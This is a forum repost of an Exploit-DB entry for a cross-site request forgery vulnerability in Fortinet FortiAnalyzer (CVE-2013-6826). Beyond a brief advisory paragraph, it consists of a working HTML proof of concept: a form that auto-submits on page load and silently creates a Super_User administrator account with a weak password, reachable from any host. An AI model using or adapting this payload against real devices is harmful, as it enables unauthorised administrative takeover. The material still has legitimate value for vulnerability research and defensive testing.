Exploit Fortinet FortiAnalyzer - Cross-Site Request Forgery

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
38824
Проверка EDB
  1. Пройдено
Автор
WILLIAM COSTA
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
cve-2013-6826
Дата публикации
2013-10-12
Fortinet FortiAnalyzer - Cross-Site Request Forgery
HTML:
source: https://www.securityfocus.com/bid/63663/info

FortiAnalyzer is prone to a cross-site request-forgery vulnerability because it fails to properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions in the context of the device running the affected application. Other attacks are also possible.

Versions prior to Fortianalyzer 4.3.7 and 5.0.5 are vulnerable. 

<html>



<body onload="CSRF.submit();">



<html>



<body onload="CSRF.submit();">



<form id="csrf"
action="https://www.example.com/IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog";
method="post" name="CSRF">

<input name="userId" value="user.via.cfsr"> </input>

<input name="type" value="0"> </input>

<input name="rserver" value=""> </input>

<input name="lserver" value=""> </input>

<input name="subject" value=""> </input>

<input name="cacerts" value="Fortinet_CA2"> </input>

<input name="password" value="123456"> </input>

<input name="password_updated" value="1"> </input>

<input name="confirm_pwd" value="123456"> </input>

<input name="confirm_pwd_updated" value="1"> </input>

<input name="host_1" value="0.0.0.0/0.0.0.0"> </input>

<input name="host_2" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_3" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_4" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_5" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_6" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_7" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_8" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_9" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_10" value="255.255.255.255/255.255.255.255"> </input>

<input name="host6_1"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_2"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_3"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_4"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_5"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_6"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_7"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_8"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_9"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_10"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="profile" value="Super_User"> </input>

<input name="alladomRDGrp" value="0"> </input>

<input name="_adom" value=""> </input>

<input name="allpackRDGrp" value="0"> </input>

<input name="_adom" value=""> </input>

<input name="allpackRDGrp" value="0"> </input>

<input name="_pack" value=""> </input>

<input name="desc" value=""> </input>

<input name="showForce" value="0"> </input>

<input name="numhosts" value="0"> </input>

<input name="numhosts6" value="3"> </input>

<input name="_comp_8" value="OK"> </input>

<input name="actionevent" value="new"> </input>

<input name="profileId" value=""> </input>

<input name="mgt" value=""> </input>

<input name="dashboard" value=""> </input>

<input name="dashboardmodal" value=""> </input>

<input name="csrf_token" value=""> </input>





</form>

</body>



</html>
 
Источник
www.exploit-db.com

Похожие темы